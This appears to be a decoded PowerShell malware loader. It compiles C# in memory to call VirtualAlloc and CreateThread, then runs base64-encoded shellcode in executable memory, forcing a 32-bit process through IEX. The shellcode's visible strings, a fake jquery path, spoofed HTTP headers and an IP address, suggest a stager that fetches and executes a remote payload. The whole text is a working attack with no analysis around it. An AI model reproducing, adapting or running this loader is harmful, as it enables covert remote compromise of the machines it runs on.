decoded

1. Set-StrictMode -Version 2
2.  
3. $eicar = ''
4.  
5. $DoIt = @'
6. $assembly = @"
7. using System;
8. using System.Runtime.InteropServices;
9. namespace inject {
10. public class func {
11. [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
12. [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
13. [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
14. [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
15. [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
16. [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
17. }
18. }
19. "@
20.  
21. $compiler = New-Object Microsoft.CSharp.CSharpCodeProvider
22. $params = New-Object System.CodeDom.Compiler.CompilerParameters
23. $params.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
24. $params.GenerateInMemory = $True
25. $result = $compiler.CompileAssemblyFromSource($params, $assembly)
26.  
27. [Byte[]]$var_code = [System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWhQAAAAU1BoV4mfxv/V63BbMdJSaAACYIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8vanF1ZXJ5LTMuMy4xLnNsaW0ubWluLmpzADEyMwAxMjMAMTIzADEyMwAxMjMAMTIzADEyMwAxMjMAMTIzADEyMwAxMjMAMTIzADEyMwAxAEFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41DQpIb3N0OiBjb2RlLmpxdWVyeS5jb20NClJlZmVyZXI6IGh0dHA6Ly9jb2RlLmpxdWVyeS5jb20vDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMzsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCgAxMjMAMTIzADEyMwAxMjMAMTIzADEyMwAxMjMAMTIzAABo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTua8PAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//NDcuMjQ0LjEuMTcyAAAAAAA=")
28.  
29. $buffer = [inject.func]::VirtualAlloc(0, $var_code.Length + 1, [inject.func+AllocationType]::Reserve -bOr [inject.func+AllocationType]::Commit, [inject.func+MemoryProtection]::ExecuteReadWrite)
30. if ([Bool]!$buffer) {
31. $global:result = 3;
32. return
33. }
34. [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $buffer, $var_code.Length)
35. [IntPtr] $thread = [inject.func]::CreateThread(0, 0, $buffer, 0, 0, 0)
36. if ([Bool]!$thread) {
37. $global:result = 7;
38. return
39. }
40. $result2 = [inject.func]::WaitForSingleObject($thread, [inject.func+Time]::Infinite)
41. '@
42.  
43. If ([IntPtr]::size -eq 8) {
44. start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
45. }
46. else {
47. IEX $DoIt
48. }